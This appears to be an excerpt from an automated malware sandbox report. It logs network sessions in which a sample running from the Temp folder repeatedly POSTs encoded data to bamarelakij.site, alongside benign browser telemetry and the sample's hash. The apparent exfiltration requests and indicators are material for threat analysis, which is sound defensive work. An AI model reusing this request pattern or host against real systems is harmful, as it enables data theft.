                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 88 a4 9e f0 e8 6c ae aa d6 8e 92 cc 66 d2 60 b2 a0 f0 5e cc 82 a4 f0 9a 64 84 9a c6 d4 88 56 c8 8c 9a a8 d2 96 d6 6e dc 86 b4 b0 5e e6 d6 88 9a 70 de e8 8c de d6 f2 de da 86 8a e4 d2 a2 6c 6a f4 aa aa 9c da 5e c4 88 68 de a4 94 90 8e 64 f4 de a0 c2 d4 84 c8 d4 98 9a 66 c4 6c a2 92 a4 d8 8a d2 e6 72 96 9e 90 c2 8a a8 6c c4 c6 c6 d2 a0 68 a8 e0 c6 c4 8a a6 9e 66 66 92 a4 ee f2 d2 94 9e 90 94 f0 ce 8a e0 72 8a d2 de ac e2 82 c2 5e 92 8c b4 94 b2 ec b2 de 64 dc 64 e2 9c 8e a4 aa 5e dc 66 8a 9c a6 70 ae d4 b2 de 8c 8e ce 60 a8 88 68 d2 ea e0 64 8e 90 f0 86 dc 70 a0 dc ec ae 98 ea d6 cc d0 84 ea 5e 86 d8 66 9c c8 9e 84 9e 8e 8e 56 f4 84 d0 f0 6e 9e d0 60 82 96 ce e4 6e ce d4 b4 ae a8 e0 e8 62 70 c4 da 9a ac 8a c8 86 9c ac c6 d4 96 c4 c2 f0 d0 ec 98 96 a2 e8 66
                                                                                                                                                                                                                                                                          Data Ascii: lf`^dVn^plj^hdflrlhffr^dd^fp`hdp^fVn`nbpf
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: c4 ae c6 d4 ce cc ac 72 82 62 62 a6 98 60 e6 6c ce ae 68 9a ce ac 90 e0 9c 70 9a ca c6 60 c4 62 ec da 98 8a ce d2 de 96 ce 8c a6 a2 a2 84 c4 60 8a a6 ce f2 a4 90 92 d2 64 6c ca d4 8e e8 8a c8 e6 82 84 90 c6 60 da 6c 86 c8 a6 64 68 c6 86 d8 a6 72 a4 96 d0 f2 a0 86 de 64 94 e2 d2 a6 d2 62 f2 d0 da e0 e6 de ac 9c 82 b4 a4 ea a6 88 d2 f0 ac ea a0 f4 88 d6 da c6 9c 6a 90 b0 f0 84 c4 ac 66 a4 c6 96 b4 e6 a4 aa 9a d4 86 56 70 90 c2 98 82 e8 72 f2 ce 6c 6c ec 94 b0 84 6e e8 70 66 d8 9e e8 a4 9e 8c 68 72 d8 c8 84 96 e2 c6 82 de cc de d8 86 e0 a4 b0 ec 60 a4 a4 d2 e8 aa ec c6 c8 d0 f2 9a da f0 5e a8 94 90 de ac dc de f0 a4 ae 96 d6 8a b2 ce e0 8a de 70 e4 94 70 86 e8 90 60 96 88 d0 9e e0 d6 a6 56 ce ea ce c2 6c cc ac ac c4 a8 9e 86 f2 72 c2 64 e8 de cc 98 60 9e d4
                                                                                                                                                                                                                                                                          Data Ascii: rbb`lhp`b`dl`ldhrdbjfVprllnpfhr`^pp`Vlrd`
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 94 d0 d0 a4 66 da c2 66 aa ae 68 8e 90 f4 70 f0 8a a6 9e ec 68 ec dc 84 9e d6 8e ae 84 6a aa ea e2 72 c4 94 6a a0 e4 e4 b4 9e c8 e2 d4 c6 64 a2 f0 88 da a8 d4 88 66 64 a2 c2 ee ec 6c ca 6a b2 6a d8 9c d4 9a 86 c8 ca 6a f2 6a 66 64 dc b0 98 f4 f2 98 d0 e6 da a4 d0 ec a2 c6 64 6a a0 c6 64 90 6a ea 72 98 de b2 56 66 ea a4 a4 8a aa a6 8c aa dc aa ea d2 b0 e2 96 9c e8 98 8a 9a 70 9c ec c8 98 e6 d2 72 b4 5e 64 ca cc e4 ca 90 f0 56 ea d0 72 c2 64 b2 6a 90 d6 c4 a0 6a b0 ce 88 cc 66 f0 5e f0 cc c6 a8 66 da 70 d4 66 e4 64 aa ca 6c 86 ac d2 e6 e0 d8 9a 68 c4 da b4 dc a2 cc 56 62 5e 9a ec f0 a8 b4 8c da b2 70 f2 9a f4 72 ce 6a dc f4 8a f4 84 8a f4 c4 f2 92 f4 5e 72 da 60 6a 5e 8c de d4 6a dc cc 70 e8 6c b0 b2 d0 8e dc a4 b4 f2 64 d2 b4 ee 64 e2 e8 c2 8a ce ac e4 c4
                                                                                                                                                                                                                                                                          Data Ascii: ffhphjrjdfdljjjjfddjdjrVfpr^dVrdjjf^fpfdlhVb^prj^r`j^jpldd
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 86 f2 a8 88 d2 a2 98 86 84 84 9c 9e 88 c6 a2 a6 88 a8 9a a2 cc ea 86 9c c4 96 98 82 b0 a2 b0 56 9e 9a 92 8c d2 94 c8 d0 cc d0 a4 68 e2 96 de 9a 60 a4 ac a6 da 82 ae d2 9c d8 60 ee 88 88 9e cc 92 70 68 9a 64 a4 ac 84 a2 94 ca 88 86 b2 b4 ae f4 f2 ce d2 e8 96 a6 d6 b4 c8 82 a2 a0 d2 de 6c c2 a8 dc 8a a6 92 d0 e8 ca b0 ce ec da 84 c2 6c ce e4 e8 6a 84 9c 68 d2 cc 88 ca 68 a4 e2 d6 c6 62 84 e8 68 82 c6 e0 a8 aa c6 82 66 9a 9c ee 86 b2 dc c4 92 dc da 8a 92 9a d0 a2 6e c4 96 9a 8e 84 86 d2 e0 90 94 8a 8c 9e 8e b4 ce c2 dc d4 e2 9a d8 8e 9c c6 8c ea ce 82 d4 ae f2 c4 c6 9a 84 b0 66 d6 ac 5e 86 6c da c6 d4 d6 94 dc ce 62 60 a8 84 c2 84 92 ac f0 5e da 8e 84 c8 62 e2 84 c6 e6 94 f0 c6 a0 ce 9a 98 de e0 8c ac 82 de 70 6a e6 d0 aa 8e ae ee b0 b0 88 72 b2 8e a8 e4 9e
                                                                                                                                                                                                                                                                          Data Ascii: Vh``phdlljhhbhfnf^lb`^bpjr
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 9c d6 96 62 d8 b4 9a 9c a6 e4 f4 6a 9c a8 d4 f4 f4 a6 a0 72 6c 56 56 9a e2 a8 82 b4 6c c6 ea b0 88 94 d8 c4 e6 e8 e8 b0 b4 a0 d0 de 8a ec 98 b0 9a a0 94 d4 9a da 88 82 64 96 66 e4 9e a2 82 ca da e0 60 ca 6a 9a 90 92 ec d2 e6 82 e2 a8 e6 ae b4 d0 62 d8 5e 68 f2 66 e2 a0 ea 86 64 66 ae 64 62 6c a6 f0 c8 ce f4 dc cc 9e 88 9c 56 f0 e2 d4 5e ca 6c 96 70 cc 8e ae 6c 8a a8 c8 f2 ce a0 84 f4 b4 9c c8 ec 88 6e e0 de f0 a0 ac 64 9c 5e aa f4 a8 ac 92 64 8a 5e aa f4 d4 d4 90 90 d0 56 94 8a d4 6e e2 a0 9a a6 d8 98 62 d6 c8 b2 b4 68 66 d4 e6 ce d2 8a f4 ea a0 a2 ac a0 82 b2 60 b2 a2 ae a0 a4 b4 ca 56 ce d0 cc 84 8c 6e 9e 86 f0 70 86 aa 6e 70 c4 e6 94 ac e0 da f0 6e 88 8a a4 ac 64 96 f0 ec d8 ec dc f0 d6 ae 82 d4 f2 f0 cc 9e a8 f0 9a 60 6c 6a 64 8c e0 e0 d6 66 de a2 6a
                                                                                                                                                                                                                                                                          Data Ascii: bjrlVVldf`jb^hfdfdblV^lplnd^d^Vnbhf`Vnpnpnd`ljdfj
2025-01-09 13:56:25 UTC | 731 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:25 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMMphFQrRc8OaHj7BeOtOnZMynzkkFF6HFDxAkx8yjfjT5jTvF9sdsvnsMhDpg3YNidfHlN9garCVurMIooPbd%2FZvhFKmZLNxD1n4EgWIe389PCZ%2B9eiP0k%2BMSCLg1KjHzX6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee35bcea4375-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1581&rtt_var=612&sent=227&recv=686&lost=0&retrans=0&sent_bytes=2837&recv_bytes=687619&delivery_rate=1760096&cwnd=32&unsent_bytes=0&cid=e1e6da583124eacf&ts=874&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 50095 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:25 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 745
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:25 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                                                                                                                          Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
2025-01-09 13:56:26 UTC | 730 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:26 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FUP6e%2FoDsJ3NLyLV4Ysjk7j%2BTwUdmKb%2FyvqcC9f6Jmd6MYmyEZYo5EGgIDHl6gb5rS6ZfH9DgZofiePMVfj5sihcCLEvliLdKsHm%2B27Ex0eIQrYKiXadMquPkN7y5hsMlsk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee3ebb9941f8-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1617&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1767&delivery_rate=1697674&cwnd=223&unsent_bytes=0&cid=5207d6b1c699cc48&ts=325&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 50096 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:26 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 212
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:26 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: p_ G6@'%#@XZZ
2025-01-09 13:56:27 UTC | 732 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:27 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2ByZqMA0vIlT4ANlZj8HftVitfAAsbyh%2B0iTJQh0BoD2WOUsNcachYihaSHz478v4Y1XgRDkySmLJdZ8O%2Bk%2BpandSOJI%2BGk0GyneEuElE1aHiOw0f%2BPzHcImCmpL0UYyN0Dm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee449fc9431c-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1569&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1234&delivery_rate=1829573&cwnd=237&unsent_bytes=0&cid=56ee8424aa7b9de9&ts=333&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 50097 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:27 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:28 UTC | 732 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:56:27 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkcRkyMb4fO8zQWgg2UdiPjL9MMdfyDnfgqyGAFiFqNu9W39bPYFt%2FwO%2BwtYd9VhbcWuAl8xNnSRuw%2B%2FkaoQkc7CrfF4WqJYNVBuhLgA3g3Yf%2FoPJ8f%2B052QpSBJJwaBURWX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ee49fb1f4219-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1587&rtt_var=599&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1402&delivery_rate=1822721&cwnd=193&unsent_bytes=0&cid=1b32966173fa63d9&ts=267&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 50098 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:28 UTC | 388 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: B5smxlJLNo14xsxDJtIvbZCH8YE
Content-Length: 14825
Host: bamarelakij.site
2025-01-09 13:56:29 UTC | 726 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:56:29 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqFpH3kfmmnhl902a5NU%2F%2FZhsl440AadNSDn6iZyy5s4F8dhaXw0xx8YbIpr11xpAB0oUmStTB12tqLtBbvKySMwNTf7cqz2N6Tj1Le2Zs6keFYe0i9NmX8SjChT3UXFXgRW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ee50be5341af-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1711&rtt_var=753&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15871&delivery_rate=1353732&cwnd=224&unsent_bytes=0&cid=b2efb53748fe6b6b&ts=218&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 50099 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:29 UTC | 388 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: B5smxlJLNo14xsxDJtIvbZCH8YE
Content-Length: 68959
Host: bamarelakij.site
2025-01-09 13:56:30 UTC | 729 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:56:30 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRmWcx2XcbE6loaF93%2BbDrJSOSitCGQ6A8VK9sjKVvXVjrUCjbfCHBGbHY42%2ByVbGXbfaJDMSnHYQMFJ2gmNkYcomeLZO7%2FytIDfC4hO5hyDertBx4RCwgoRHTzj02JCBrJh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ee56ee048c30-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2121&min_rtt=1832&rtt_var=894&sent=28&recv=76&lost=0&retrans=0&sent_bytes=2837&recv_bytes=70159&delivery_rate=1593886&cwnd=218&unsent_bytes=0&cid=a66ec9b8f082739d&ts=507&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 50100 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:31 UTC | 385 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: B5smxlJLNo14xsxDJtIvbZCH8YE
Content-Length: 35
Host: bamarelakij.site
2025-01-09 13:56:31 UTC | 35 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2025-01-09 13:56:31 UTC | 720 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:56:31 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdVjF6taWhj4kRfGXpNszP1KU4gyptG2mBYhwMu4rE2QZn6PkPzOy6HCesPmENsr9YnbdXIx3I6xJSMfdjixJGdtJEaUnpecMtEgi5HLJcAv73hw9s2ZMxTxeDUB4qDKMyKG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ee5e6ca6c40c-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1566&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1056&delivery_rate=1826141&cwnd=221&unsent_bytes=0&cid=79f440b884cab394&ts=307&x=0"


                                                                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                          34 | 192.168.2.8 | 50102 | 23.200.0.38 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                          2025-01-09 13:56:39 UTC | 430 | OUT | OPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Origin: https://assets.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:56:40 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:40 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                          X-CDN-TraceId: 0.15ac2d17.1736430999.13b295df
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                          35 | 192.168.2.8 | 50103 | 23.200.0.38 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC | 373 | OUT | POST /api/report?cat=msn HTTP/1.1
                                                                                                                                                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 485
                                                                                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC | 485 | OUT | Data Raw: 5b 7b 22 61 67 65 22 3a 34 38 33 38 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 33 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 34 2e 32 38 2e 31 39 30 2e 39 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 6f 6b 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 73 73 65
                                                                                                                                                                                                                                                                          Data Ascii: [{"age":48388,"body":{"elapsed_time":130,"method":"GET","phase":"application","protocol":"h3","referrer":"https://ntp.msn.com/","sampling_fraction":0.001,"server_ip":"184.28.190.91","status_code":200,"type":"ok"},"type":"network-error","url":"https://asse
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:41 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                          X-CDN-TraceId: 0.17ac2d17.1736431001.3c60527
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:08:54:12
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\kXzODlqJak.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                                                                                                                                          File size:14'323'584 bytes
                                                                                                                                                                                                                                                                          MD5 hash:AB79EAFCCE0D6EFF856B259977E480E1
